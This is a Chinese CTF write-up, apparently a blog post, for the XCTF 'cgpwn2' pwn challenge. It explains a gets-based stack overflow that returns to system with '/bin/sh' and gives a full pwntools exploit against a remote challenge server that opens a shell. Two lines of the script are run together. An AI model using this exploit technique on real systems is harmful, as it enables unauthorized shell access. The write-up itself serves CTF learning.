[攻防世界 pwn]——cgpwn2
[攻防世界 pwn]——cgpwn2
- 题目地址: https://adworld.xctf.org.cn/
- 题目:
checksec一下看看, 仅仅开启了NX保护
在IDA中 look look, 竟然发现了system函数不过参数不对
’
思路
先将 "/bin/sh" 写入name, 然后利用gets进行栈溢出, system作为返回值, name作为system的参数
exploit
from pwn import *
p=remote("111.200.241.244",53774)
name_addr = 0x0804A080
sys_addr = 0x0804855A
payload = 'a' * (0x26 + 0x4) + p32(sys_addr) + p32(name_addr)p.sendlineafter("please tell me your name\n", '/bin/sh')
p.sendlineafter("hello,you can leave some message here:\n",payload)
p.interactive()
[攻防世界 pwn]——cgpwn2相关推荐
- 【pwn】攻防世界 pwn新手区wp
[pwn]攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界的pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了. 1.get_sh ...
- 攻防世界(Pwn) forgot---栈溢出;(方法二)
攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...
- 攻防世界(Pwn) forgot---栈溢出;(方法一)
攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...
- [攻防世界 pwn]——pwn1(内涵peak小知识)
[攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...
- [攻防世界 pwn]——实时数据监测
[攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...
- [攻防世界 pwn]——monkey
[攻防世界 pwn]--monkey 题目地址:https://adworld.xctf.org.cn/ 题目: 额,怎么说呢这道题.checksec没什么大不了的 但是再IDA中就懵了,好大呀.好多 ...
- [攻防世界 pwn]——反应釜开关控制
[攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...
- [攻防世界 pwn]——pwn-100
[攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...
- [攻防世界 pwn]——pwn-200
[攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...
最新文章
- Facebook发布Detectron2,下一个万星目标检测新框架
- 设计模式(十二):通过ATM取款机来认识“状态模式”(State Pattern)
- idea 代码自动补全快捷键
- 基于MATLAB的costas载波同步+gardner时间同步,QPSK调制
- Java 13,最新最全新特性解读
- C#中全局处理异常方式
- HTML+CSS+Javascript教学视频【0409更新】
- paip.提升用户体验之全角半角
- 【Android】OKHTTP使用
- 如何计算虚拟化vcpu_【科普】CPU和内存虚拟化
- linux给文件夹添加查看密码是什么,Linux如何给文件夹设置密码
- ImageNet千分类标签翻译
- 大学四年,靠着这些学习网站,我从挂科学渣变成了别人眼中的大神
- 「股价飙到100美元我就纹身」,黄仁勋用十年站在了芯片塔尖
- C++switch语句详解
- 动态合批和静态合批的区别
- ubuntu安装与配置ngnix静态代理与反向代理的流程
- oracle存储过程语法与使用
- GridView 使用方法 - 前台部分
- 王道快速排序内容复习
热门文章
- java线程在什么时候结束,java – 什么时候线程超出范围?
- [CentOS Python系列] 四.阿里云服务器CentOS连接远程MySQL数据库及pymsql
- 2020年第十一届蓝桥杯 - 省赛 - C/C++研究生组 - F.成绩分析
- Django-RQ介绍
- 990. Satisfiability of Equality Equations
- 信息学奥赛一本通(C++)在线评测系统——基础(一)C++语言—— 1065:奇数求和
- 【ARM】Tiny4412裸板编程之静态库(libc.a)
- 【Linux】一步一步学Linux——tracepath命令(168)
- 【物联网】 Ubuntu中生成交叉编译器xtensa-lx106-elf
- [Qt教程] 第40篇 网络(十)WebKit初识